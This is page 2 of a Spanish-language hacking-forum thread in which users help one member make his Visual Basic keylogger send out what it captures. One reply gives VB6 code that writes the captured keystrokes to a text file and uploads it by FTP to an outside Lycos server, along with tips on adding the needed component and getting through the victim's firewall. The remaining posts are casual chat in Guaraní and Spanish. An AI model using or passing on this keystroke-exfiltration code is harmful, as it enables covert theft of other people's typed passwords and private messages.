elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Ayuda kon Keylogger
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda kon Keylogger  (Leído 3,648 veces)
cherembo

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: Ayuda kon Keylogger
« Respuesta #10 en: 2 Octubre 2006, 18:45 pm »

Gracias por todo! me gusta muxo... kreo que voy a probar esto de msinet... muxas gracias enserio  ;D ;D ;D


En línea

cherembo

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: Ayuda kon Keylogger
« Respuesta #11 en: 2 Octubre 2006, 19:21 pm »

estuve provando la opcion que posteo Ubetor^^ y no me funciono... puse para que kada vez que se ejekute el keylogger haga ese proceso.. osea... al kargar el form... pero nada... lo estuve provando y no subio nada... no se si hice algo mal pero no me funciono yo hice de esta manera:
Código:
Inet1.Execute "ftp://user:password@ftp.usuarios.lycos.es", "PUT keys" & ".txt"

no se si esta bien... si hice algo mal que alguien me korrija porfa... :D


En línea

ubetor^^

Desconectado Desconectado

Mensajes: 227



Ver Perfil
Re: Ayuda kon Keylogger
« Respuesta #12 en: 2 Octubre 2006, 20:40 pm »

Me imagino que abrás agregado la OCX al proyecto antes de compilarlo. Por si no lo as exo, te vas a proyecto->Componentes->Y tildas la casilla del control (Microsoft Internet Transfer Protocol 6.0), después aplicas...

Tu cuenta FTP no tiene porque ser con lycos, pero a mi con otros dominios (como los de No-ip) no me funcionaron...por l que me creé una cuenta en lycos, y entonces si que funcionó...En este ejemplo el archivo llegaría con este nombre ".txt".

Este code lo que hace es enviar un .txt, este .txt debe ser creado por el programa...y en este caso el contenido serían las capturas del keylogger, xd Me imagino que habrás incluído el code  :-\

Aquí va el code de una aplicación que crea un .txt con el contenido de una variable (x ejemplo):

Código:
Open ("prueba.txt") For Output As #1
Print #1, capturadoporelkeylogger
Close #1
Inet1.Execute "ftp://user:pass@ftp.usuarios.lycos.es", "PUT prueba.txt " & ".txt"

Habiendo hecho todo esto no debería de haber ningún problema (si tienes firewall tendrás que darle acceso al programa...)

salu2 y suerte!

P.D: Estando yo en la conver preferirí que te dirigeses a mí en 2ª persona ;)
En línea

cherembo

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: Ayuda kon Keylogger
« Respuesta #13 en: 3 Octubre 2006, 22:10 pm »

te podria agregar al msn? ...ydiskulpa por referirme a ti en primera persona :p xD
En línea

Castord

Desconectado Desconectado

Mensajes: 60



Ver Perfil
Re: Ayuda kon Keylogger
« Respuesta #14 en: 4 Octubre 2006, 00:33 am »

mba'eiko che kuate! jajaja

ñande reta ko'ape
En línea

Desde Asunción - Paraguay
/*Es una ***** pero igual amo mi país!*/
cherembo

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: Ayuda kon Keylogger
« Respuesta #15 en: 5 Octubre 2006, 20:19 pm »

jajaja mba'e piuo rejapo nde ko'arupi... :p eñembo hacker se pio jajajaja
En línea

Castord

Desconectado Desconectado

Mensajes: 60



Ver Perfil
Re: Ayuda kon Keylogger
« Respuesta #16 en: 5 Octubre 2006, 23:39 pm »

jajaja! kachiai loperro!!

nahani... aju reinte... aprograma vb6, c++, php, mysql... che rekoreigui aju... jajaja

che ajapo petei keylogger vb6 pe...

reipotavo cheavisante...

oima chera'a

En línea

Desde Asunción - Paraguay
/*Es una ***** pero igual amo mi país!*/
Castord

Desconectado Desconectado

Mensajes: 60



Ver Perfil
Re: Ayuda kon Keylogger
« Respuesta #17 en: 5 Octubre 2006, 23:42 pm »


ikalida la nde nick... jajaja

hetama aputa hese ahecharo ko'ape....
En línea

Desde Asunción - Paraguay
/*Es una ***** pero igual amo mi país!*/
cherembo

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: Ayuda kon Keylogger
« Respuesta #18 en: 6 Octubre 2006, 15:57 pm »

oima che ra'a... che agregantema... msn pe... emondo cheve petei mensaje privado ... uperupi amondota ndeve la che email :D oimapa....
En línea

Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda,keylogger.
Análisis y Diseño de Malware
-H4D3S- 5 2,813 Último mensaje 14 Mayo 2013, 19:50 pm
por daryo
Ayuda, keylogger
Seguridad
kopolo 2 1,732 Último mensaje 14 Junio 2014, 03:47 am
por Mister12
usb keylogger ayuda
Hacking
MrVndT 1 1,895 Último mensaje 27 Marzo 2015, 02:00 am
por Henyckma
Ayuda con Keylogger
Scripting
S4ur1k 1 756 Último mensaje 5 Abril 2020, 09:09 am
por fary
ayuda con keylogger
Análisis y Diseño de Malware
el_hacker1724 3 1,199 Último mensaje 25 Octubre 2021, 11:34 am
por Usuario887
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines